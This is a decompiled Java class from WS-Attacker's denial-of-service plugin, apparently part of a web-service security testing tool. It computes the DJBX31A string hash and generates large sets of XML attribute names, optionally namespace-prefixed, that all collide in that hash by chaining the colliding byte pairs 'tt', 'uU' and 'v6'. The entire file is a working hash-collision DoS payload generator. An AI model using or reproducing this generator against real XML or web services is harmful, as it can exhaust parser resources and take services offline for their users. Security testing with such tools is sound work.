/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.plugin.dos.dosExtension.attackClasses.hashDos;

import java.util.logging.Level;
import java.util.logging.Logger;
import wsattacker.plugin.dos.dosExtension.attackClasses.hashDos.CollisionInterface;

public class CollisionDJBX31A
implements CollisionInterface {
    private final Logger logger = Logger.getLogger(CollisionDJBX31A.class.getName());

    @Override
    public int getHash(String s) {
        byte[] byteArray = s.getBytes();
        int n = byteArray.length;
        int hash = 0;
        for (int i = 0; i < n; ++i) {
            hash = (hash << 5) - hash + byteArray[i];
        }
        return hash;
    }

    @Override
    public void genNCollisions(int numberAttributes, StringBuilder sb, boolean useNamespace) {
        try {
            long startTime = System.nanoTime();
            String prefix = "";
            int exponent = 1;
            while (numberAttributes > (int)Math.pow(3.0, exponent)) {
                ++exponent;
            }
            if (useNamespace) {
                prefix = "xmlns:";
            }
            for (int i = 0; i < numberAttributes; ++i) {
                sb.append(prefix + this.getCollisionString(i, exponent) + "=\"" + i + "\" ");
            }
            long endTime = System.nanoTime();
            long duration = endTime - startTime;
            double d = (double)duration / 1.0E9;
            this.logger.log(Level.FINE, "Runtime using DJBX31A creating n=" + numberAttributes + " collisions: " + d + "seconds");
        }
        catch (Exception e) {
            System.err.println("Error: " + e.getMessage());
        }
    }

    @Override
    public String getCollisionString(int i, int n) {
        byte[] StringCollision0 = new byte[]{116, 116};
        byte[] StringCollision1 = new byte[]{117, 85};
        byte[] StringCollision2 = new byte[]{118, 54};
        int numberElements = 2 * n;
        byte[] output = new byte[numberElements];
        for (int j = 0; j < numberElements; j += 2) {
            output[j] = 116;
            output[j + 1] = 116;
        }
        int divisor = i;
        int rest = 0;
        int count = 2 * n - 1;
        while (divisor != 0) {
            rest = divisor % 3;
            divisor /= 3;
            switch (rest) {
                case 0: {
                    output[count] = StringCollision0[1];
                    output[count - 1] = StringCollision0[0];
                    break;
                }
                case 1: {
                    output[count] = StringCollision1[1];
                    output[count - 1] = StringCollision1[0];
                    break;
                }
                case 2: {
                    output[count] = StringCollision2[1];
                    output[count - 1] = StringCollision2[0];
                }
            }
            count -= 2;
        }
        return new String(output);
    }
}

